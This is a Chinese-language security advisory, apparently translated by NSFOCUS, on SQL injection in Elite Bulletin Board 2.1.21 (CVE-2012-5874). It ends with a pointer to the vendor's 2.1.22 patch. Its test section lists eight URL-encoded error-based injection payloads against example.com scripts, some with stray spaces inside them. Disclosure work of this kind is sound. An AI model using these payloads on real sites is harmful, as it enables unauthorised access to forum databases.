安全研究

安全漏洞
Elite Bulletin Board "/includes/user_function.php"脚本多个函数SQL注入漏洞

发布日期:2012-12-19
更新日期:2012-12-21

受影响系统:
Elite Bulletin Board Elite Bulletin Board 2.x
Elite Bulletin Board Elite Bulletin Board 2.x
描述:
BUGTRAQ  ID: 57000
CVE(CAN) ID: CVE-2012-5874

Elite Bulletin Board是电子公告版软件。

Elite Bulletin 2.1.21及其他版本"/includes/user_function.php"内的"update_whosonline_reg()"和"update_whosonline_guest()"函数没有效过滤URI数据,远程攻击者可以发送特制的HTTP请求到下列脚本,并在应用的数据库内执行任意SQL命令:

- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php
- viewtopic.php

<*来源:High-Tech Bridge Security Research Lab
  
  链接:https://www.htbridge.com/advisory/HTB23133
        http://www.securelist.com/en/advisories/51622
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/groups.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/index.php/%27,%28%28select*from%28selec t%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/login.php/%27,%28%28select*from%28select %20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/quicklogin.php/%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/register.php/%27,%28%28select*from% 28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/

http://www.example.com/viewboard.php/%27,%28%28select*from%2 8select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

http://www.example.com/viewtopic.php/%27,%28%28select *from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&amp;amp;tid=1

建议:
厂商补丁:

Elite Bulletin Board
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载v2.1.22:

http://elite-board.us/Community/viewtopic.php?bid=1&tid=310

http://sourceforge.net/projects/elite-board/files/Elite%20Bulletin%20Board%20v2/2.1.22/

浏览次数:4903
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障